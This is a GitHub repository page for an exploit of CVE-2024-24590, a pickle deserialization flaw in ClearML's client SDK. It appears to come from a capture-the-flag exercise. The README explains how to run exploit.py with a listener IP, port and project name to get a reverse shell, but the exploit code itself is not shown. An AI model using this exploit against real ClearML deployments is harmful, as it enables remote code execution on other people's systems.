Skip to content
/ CVE-2024-24590 Public

Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.

1 star 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

junnythemarksman/CVE-2024-24590

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

CVE-2024-24590

Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.

Usage

  1. paste the credentials given and run clearml-init
  2. run the exploit.py python script in one terminal and have a listener in another terminal
  3. might need to run the exploit many times to get a reverse shell
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'

Exploit details

  1. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
  2. https://www.cvedetails.com/cve/CVE-2024-24590/

About

Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages